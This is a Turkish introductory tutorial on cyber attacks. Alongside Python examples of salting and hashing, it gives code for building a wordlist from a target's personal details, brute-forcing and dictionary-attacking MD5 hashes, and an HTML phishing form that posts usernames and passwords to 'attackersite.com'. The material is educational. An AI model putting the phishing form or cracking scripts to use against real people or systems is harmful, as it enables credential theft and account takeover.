Siber Saldırı nedir ?

Siber saldırılar, kötü niyetli kişilerin veya grupların bilgisayar sistemlerine, ağlara ve cihazlara zarar vermek, bilgi çalmak veya sistemleri kullanılamaz hale getirmek amacıyla gerçekleştirdiği saldırılardır. Günümüzde siber saldırılar giderek artmakta ve bireylerden büyük şirketlere kadar birçok hedefi tehdit etmektedir.

1. Salt Nedir?

Salt, bir parolanın güvenliğini artırmak için kullanılan rastgele bir dizedir. Bir parolayı hash fonksiyonuna göndermeden önce eklenerek hash değerinin tahmin edilmesini zorlaştırır. Aynı parolaya sahip kullanıcıların farklı hash değerlerine sahip olmasını sağlar.

Örnek: Python ile Salt Kullanımı

import os
import hashlib

def hash_password(password):
    salt = os.urandom(16)  # 16 byte rastgele salt
    hashed_password = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)
    return salt + hashed_password

password = "sifre123"
hashed = hash_password(password)
print(hashed.hex())

2. Hash Nedir?

Hash, bir verinin sabit uzunlukta ve benzersiz bir özetini oluşturan matematiksel bir fonksiyondur. Veriyi tek yönlü olarak şifreler, yani hashlenmiş bir veriyi geri döndürmek mümkün değildir.

Örnek: Python ile Hashleme

import hashlib

def hash_data(data):
    return hashlib.sha256(data.encode()).hexdigest()

print(hash_data("Gizli Mesaj"))

3. Kişiye Özgün Wordlist Oluşturma

Kişiye özel wordlist oluşturmak, hedef kişinin bilgileri (ad, doğum tarihi, evcil hayvan adı vb.) kullanılarak güçlü tahminler içeren bir liste oluşturmayı amaçlar.

Python ile Wordlist Oluşturma

import itertools

kelimeler = ["ahmet", "1234", "1905", "fener", "pass"]
wordlist = [''.join(i) for i in itertools.permutations(kelimeler, 2)]

with open("wordlist.txt", "w") as f:
    for word in wordlist:
        f.write(word + "\n")

4. Brute Force Attack

Brute Force saldırısı, tüm olası kombinasyonları deneyerek şifreyi kırmaya çalışır. Bu saldırı, özellikle kısa ve zayıf şifrelerde etkilidir.

Örnek: Python ile Brute Force

import itertools
import hashlib

def brute_force(target_hash, chars, max_length=4):
    for length in range(1, max_length + 1):
        for guess in itertools.product(chars, repeat=length):
            guess = ''.join(guess)
            if hashlib.md5(guess.encode()).hexdigest() == target_hash:
                return guess
    return None

hash_degeri = hashlib.md5("1234".encode()).hexdigest()
print(brute_force(hash_degeri, "0123456789"))

5. Dictionary Attack

Dictionary saldırısı, daha önce sızdırılmış veya tahmin edilebilir şifreleri içeren bir kelime listesini kullanarak saldırı yapar.

Örnek: Python ile Dictionary Attack

import hashlib

def dictionary_attack(hash_to_crack, wordlist):
    with open(wordlist, "r") as file:
        for word in file:
            word = word.strip()
            if hashlib.md5(word.encode()).hexdigest() == hash_to_crack:
                return word
    return None

hash_to_crack = hashlib.md5("password123".encode()).hexdigest()
print(dictionary_attack(hash_to_crack, "wordlist.txt"))

6. Phishing

Phishing saldırıları, kullanıcıları kandırarak kişisel bilgilerini ele geçirme yöntemidir. Sahte e-postalar, web siteleri ve sosyal mühendislik teknikleri kullanılır.

Örnek: Sahte Giriş Sayfası (HTML)

<form action="http://attackersite.com/log" method="POST">
    <label>Kullanıcı Adı:</label><br>
    <input type="text" name="username"><br>
    <label>Şifre:</label><br>
    <input type="password" name="password"><br>
    <button type="submit">Giriş</button>
</form>

7. Sosyal Mühendislik

Sosyal mühendislik, insanları manipüle ederek bilgi sızdırmayı amaçlar. Yaygın yöntemler şunlardır:

Telefonla sahte müşteri hizmetleri aramaları
Kimlik avı e-postaları
USB tuzakları
Sahte güvenlik görevlisi kılığına girme

8. Guess Attacks

Guess Attack, basit tahminler kullanarak bir hesaba giriş yapmayı hedefler. Örneğin, kullanıcı adı “admin” ve şifre “123456” gibi tahmin edilebilir kombinasyonları dener.